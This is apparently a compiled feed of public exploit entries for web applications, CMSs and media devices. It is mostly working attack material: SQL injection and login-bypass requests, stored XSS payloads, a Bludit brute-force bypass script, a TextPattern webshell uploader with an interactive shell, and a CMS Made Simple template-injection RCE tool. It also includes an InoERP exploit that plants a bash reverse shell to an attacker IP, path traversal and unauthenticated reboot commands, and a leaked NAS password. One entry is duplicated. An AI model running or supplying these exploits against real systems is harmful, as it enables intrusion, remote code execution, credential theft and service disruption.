ISHACK AI BOT

# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection # Date: 22/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #parameter Vulnerable: id # Injected Request GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D //Comment Above request will print database name and MariaDB version.

# Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection # Date: 22/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #parameter Vulnerable: id # Injected Request GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D //Comment Above request will print database name and MariaDB version.

# Exploit Title: Gym Management System 1.0 - Authentication Bypass # Date: 21/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/gym/gym/login.php Step 2: use payload jyot' or 1=1# in Username and Password field Malicious Request POST /gym/gym/ajax.php?action=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 55 Origin: http://localhost Connection: close Referer: http://localhost/gym/gym/login.php Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23 Step 3: You will be logged in as admin.

#!/usr/bin/python3 # Exploit ## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass ## Author: ColdFusionX (Mayank Deshmukh) ## Author website: https://coldfusionx.github.io ## Date: 2020-10-19 ## Vendor Homepage: https://www.bludit.com/ ## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz ## Version: <= 3.9.2 # Vulnerability ## Discoverer: Rastating ## Discoverer website: https://rastating.github.io/ ## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240 ## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ ## Patch: https://github.com/bludit/bludit/pull/1090 ''' Example Usage: - ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt ''' import requests import sys import re import argparse, textwrap from pwn import * #Expected Arguments parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt ./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)") parser.add_argument("-u","--userlist", help="Username Dictionary") parser.add_argument("-p","--passlist", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") sys.exit(1) # Variable LoginPage = args.url Username_list = args.userlist Password_list = args.passlist log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ') def login(Username,Password): session = requests.session() r = session.get(LoginPage) # Progress Check process = log.progress('Brute Force') #Getting CSRF token value CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text) CSRF = CSRF.group(1) #Specifying Headers Value headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Referer' : f"{LoginPage}", 'X-Forwarded-For' : f"{Password}" } #POST REQ data postreqcontent = { 'tokenCSRF' : f"{CSRF}", 'username' : f"{Username}", 'password' : f"{Password}" } #Sending POST REQ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) #Printing Username:Password process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) #Conditional loops if 'Location' in r.headers: if "/admin/dashboard" in r.headers['Location']: print() log.info(f'SUCCESS !!') log.success(f"Use Credential -> {Username}:{Password}") sys.exit(0) elif "has been blocked" in r.text: log.failure(f"{Password} - Word BLOCKED") #Reading User.txt & Pass.txt files userfile = open(Username_list).readlines() for Username in userfile: Username = Username.strip() passfile = open(Password_list).readlines() for Password in passfile: Password = Password.strip() login(Username,Password)

# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting # Date: 21/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages Step 2: use payload <script>alert(document.cookie)</script> in Package Name and Description field Malicious Request POST /gym/gym/ajax.php?action=save_package HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710 Content-Length: 587 Origin: http://localhost Connection: close Referer: http://localhost/gym/gym/index.php?page=packages Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D -----------------------------10391575234966392972740129710 Content-Disposition: form-data; name="id" -----------------------------10391575234966392972740129710 Content-Disposition: form-data; name="package" <script>alert(document.cookie)</script> -----------------------------10391575234966392972740129710 Content-Disposition: form-data; name="description" <script>alert(document.cookie)</script> -----------------------------10391575234966392972740129710 Content-Disposition: form-data; name="amount" 1 -----------------------------10391575234966392972740129710-- Step 3: Cookie will be reflected each time someone visits the Packages section.

#!/usr/bin/python3 # Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload # Google Dork: N/A # Date: 16/10/2020 # Exploit Author: Michele '0blio_' Cisternino # Vendor Homepage: https://textpattern.com/ # Software Link: https://github.com/textpattern/textpattern # Version: <= 4.8.3 # Tested on: Kali Linux x64 # CVE: N/A import sys import json import requests from bs4 import BeautifulSoup as bs4 from time import sleep import random import string import readline # Disable SSL warnings requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Simple Terminal User Interface class I wrote to print run-time logs and headers class Tui (): def __init__ (self): self.red = '\033[91m' self.green = '\033[92m' self.blue = '\033[94m' self.yellow = '\033[93m' self.pink = '\033[95m' self.end = '\033[0m' self.bold = '\033[1m' def header (self, software, author, cve='N/A'): print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='') print ("{}CVE:{} {}".format(self.pink, self.end, cve)) print ("{}Author:{} {}\n".format(self.pink, self.end, author)) def info (self, message): print ("[{}*{}] {}".format(self.blue, self.end, message)) def greatInfo (self, message): print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end)) def success (self, message): print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end)) def warning (self, message): print ("[{}!{}] {}".format(self.yellow, self.end, message)) def error (self, message): print ("[{}✗{}] {}".format(self.red, self.end, message)) log = Tui() log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino") if len(sys.argv) < 4: log.info ("USAGE: python3 exploit.py http://target.com username password") log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n") sys.exit() # Get input from the command line target, username, password = sys.argv[1:4] # Fixing URL target = target.strip() if not target.startswith("https://") and not target.startswith("http://"): target = "http://" + target if not target.endswith("/"): target = target + "/" accessData = {'p_userid':username, 'p_password':password, '_txp_token':""} # Login log.info ("Authenticating to the target as '{}'".format(username)) s = requests.Session() try: r = s.post(target + "textpattern/index.php", data=accessData, verify=False) sleep(1) if r.status_code == 200: log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public'])) sleep(1) # Parsing the response to find the upload token inside the main json array log.info ("Grabbing _txp_token (required to proceed with exploitation)..") soup = bs4(r.text, 'html.parser') scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2] scriptJS = json.loads(scriptJS) uploadToken = scriptJS['_txp_token'] log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken)) # The server reply with a 401 with the user provide wrong creds as input elif r.status_code == 401: log.error ("Unable to login. You provided wrong credentials..\n") sys.exit() except requests.exceptions.ConnectionError: log.error ("Unable to connect to the target!") sys.exit() # Crafting the upload request here headers = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", "Accept-Encoding" : "gzip, deflate", "X-Requested-With" : "XMLHttpRequest", "Connection" : "close", } # Generating random webshell name randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php' # Mapping multiparts here multipart_form_data = { "fileInputOrder" : (None, '1/1'), "app_mode" : (None, 'async'), "MAX_FILE_SIZE" : (None, '2000000'), "event" : (None, 'file'), "step" : (None, 'file_insert'), "id" : (None, ' '), "_txp_token" : (None, uploadToken), # Token here "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol } # Uploading the webshell log.warning ("Sending payload..") try: r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data) if "Files uploaded" in r.text: log.success ("Webshell uploaded successfully as {}".format(randomFilename)) except: log.error ("Unexpected error..") sys.exit() sleep(2) # Interact with the webshell (using the readline library to save the history of the executed commands at run-time) log.greatInfo ("Interacting with the HTTP webshell..") sleep (1) print() while 1: try: cmd = input ("\033[4m\033[91mwebshell\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False) print (r.text) except KeyboardInterrupt: log.warning ("Stopped.") exit() except: log.error ("Unexpected error..") sys.exit() print()

# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection # Google Dork: N/A # Date: 11/10/2017 # Exploit Author: Gurkirat Singh <[email protected]> # Vendor Homepage: http://www.cmsmadesimple.org/ # Software Link: N/A # Version: 2.1.6 # Tested on: Linux # CVE : CVE-2017-16783 # POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/ PFA ------- Gurkirat Singh (tbhaxor <https://google.com/search?q=tbhaxor>) from argparse import ArgumentParser, RawTextHelpFormatter from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus import requests as http import re from bs4 import BeautifulSoup, Tag from huepy import * parser = ArgumentParser(description="Exploit for CVE-2017-16783", formatter_class=RawTextHelpFormatter) parser.add_argument( "--target", "-t", help="complete remote target with protocol, host, path and query", required=True, dest="t") parser.add_argument("--command", "-c", help="command to execute (default: whoami)", default="whoami", dest="c") args = parser.parse_args() print(info("Building malicious url")) url = urlparse(args.t) query = parse_qs(url.query) query["cntnt01detailtemplate"] = [ "string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c ] query = {k: ",".join(v) for k, v in query.items()} query = unquote_plus(urlencode(query, doseq=False)) _url = url.scheme + "://" + url.netloc + url.path + "?" + query print(good("Done")) print(info("Executing payload")) r = http.get(_url) html = BeautifulSoup(r.content.decode(), "html5lib") main: Tag = html.find("article", {"id": "main"}) main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip() print(good("Done")) print(info("Result")) print(main)

# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored) # Google Dork: N/A # Date: 2020/10/24 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Vulnerable Pages: http://localhost/healthcare/Users/registration.php http://localhost/healthcare/Doctor/doctor_registration.php Proof of Concept: 1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload. 2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> adres.

# Exploit Title: Persistent XSS in SSID # Date: 10/24/2020 # Exploit Author: Amal Mohandas # Vendor Homepage: https://genexis.co.in/product/ont/ # Version: Platinum-4410 Software version - P4410-V2-1.28 # Tested on: Windows 10 Vulnerability Details ====================== Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS in the SSID parameter. This could allow attackers to perform malicious action in which the XSS popup will affect all privileged users. How to reproduce =================== 1. Login to the firmware as any user 2. Navigate to Net tab--> WLAN 3. Enter below mentioned payload in "SSID" text box <script>alert(1)</script> 4. Click on the "OK" button. 5. Relogin as any user and again navigate to Net tab--> WLAN 6. Observe the XSS popup showing persistent XSS

#!/usr/bin/python # -*- coding: UTF-8 -*- # Exploit Title: InoERP 0.7.2 Unauthenticated Remote Code Execution # Date: March 14, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/ # Software Link: https://github.com/inoerp/inoERP # Version: 0.7.2 # Tested on: Ubuntu 19 import requests import os import sys if len (sys.argv) != 4: print ("specify params in format: python inoerp.py target_url attacker_ip listening_port") else: target_url = sys.argv[1] attacker_ip = sys.argv[2] listening_port = sys.argv[3] target_url += "/modules/sys/form_personalization/json_fp.php" target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"} code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port) expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''} requests.post(target_url, headers=target_headers, data=expl_data) print ("Check your listener.")

# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS) # Date: 24-10-2020 # Exploit Author: David Bimmel # Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen # Vendor Homepage: n/a # Software Link: https://github.com/GuidoNeele/PDW-File-Browser # Version: <=1.3 The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL). Stored XSS: The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser. Below I have provided an example request were the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page. POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1 Host: <HOSTNAME> […] action=rename&new_filename=<svg+onload=alert(document.cookie s)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&typ e=file Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_spe cs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)% 3E&type=file Happy Hacking :^)

# Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability # Exploit Author: LiquidWorm # Software Link: http://request.com/ # Version: 3.0.0 ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability Vendor: ReQuest Serious Play LLC Product web page: http://www.request.com Affected version: 3.0.0 2.1.0.831 1.5.2.822 1.5.2.821 1.5.1.820 Summary: With the MediaPlayer, ReQuest delivers video content and award-winning distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an approved NAS) can be connected through your home network to your ReQuest system, delivering HD video to your television in 1080p via HDMI outputs. Desc: The device suffers from an unauthenticated file disclosure vulnerability when input passed through the 'file' parameter in tail.html and file.html script is not properly verified before being used to read web log files. This can be exploited to disclose contents of files from local resources. =============================================================================== /tail.html: ----------- function load_data() { var elem = $("#data"); $.ajax({url:"tail.html", data:{ file:elem.attr("file"), start:elem.attr("nextstart"), tail:elem.attr("tail")?elem.attr("tail"):undefined, max:elem.attr("max")?elem.attr("max"):undefined}, cache:false, async:true, success:show_data} ); } function main_start() { $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"}); window.setTimeout(load_data, 1); } function show_data(data, status, jqxhr) { var data = $("filedata", data); var newdata = data.attr("data"); var start = data.attr("start"); var nextstart = data.attr("nextstart"); var elem = $("#data"); var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20); elem.attr({tail:"", start:start, nextstart:nextstart}); if (newdata.length) elem.append(htmlspecialchars(newdata)); var delay = parseFloat(elem.attr("update"))*1000; if (isNaN(delay)) delay = 5000; if (at_end) $("html,body").scrollTop($(document).height()); window.setTimeout(load_data, delay); } $(document).ready(main_start); =============================================================================== Tested on: ReQuestHTTP/0.1 httpserver/0.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5599 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php 01.08.2020 -- http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py http://192.168.1.17:8001/file.html?file=C:\windows\win.ini

# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service # Exploit Author: LiquidWorm # Software Link: http://request.com/ # Version: 3.0.0 Vendor: ReQuest Serious Play LLC Product web page: http://www.request.com Affected version: 7.0.3.4968 (Pro) 7.0.2.4954 6.5.2.4954 6.4.2.4681 6.3.2.4203 2.0.1.823 Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers into a compact powerhouse. With the ability to add unlimited NAS devices, the F3 can handle your entire family's media collection with ease. Desc: The device can be shutdown or rebooted by an unauthenticated attacker when issuing one HTTP GET request. Tested on: ReQuest Serious Play® OS v7.0.1 ReQuest Serious Play® OS v6.0.0 Debian GNU/Linux 5.0 Linux 3.2.0-4-686-pae Linux 2.6.36-request+lenny.5 Apache/2.2.22 Apache/2.2.9 PHP/5.4.45 PHP/5.2.6-1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2020-5601 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php 01.08.2020 -- $ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff $ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot

# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure # Exploit Author: LiquidWorm # Software Link: http://request.com/ # Version: 3.0.0 ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure Vendor: ReQuest Serious Play LLC Product web page: http://www.request.com Affected version: 7.0.3.4968 (Pro) 7.0.2.4954 6.5.2.4954 6.4.2.4681 6.3.2.4203 2.0.1.823 Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers into a compact powerhouse. With the ability to add unlimited NAS devices, the F3 can handle your entire family's media collection with ease. Desc: The unprotected web management server is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit the message_log page and disclose the webserver's Python debug log file containing system information, credentials, paths, processes and command arguments running on the device. Tested on: ReQuest Serious Play® OS v7.0.1 ReQuest Serious Play® OS v6.0.0 Debian GNU/Linux 5.0 Linux 3.2.0-4-686-pae Linux 2.6.36-request+lenny.5 Apache/2.2.22 Apache/2.2.9 PHP/5.4.45 PHP/5.2.6-1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2020-5600 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php 01.08.2020 -- $ curl http://192.168.1.17/message_log ... ... Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured. Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45 ... ...

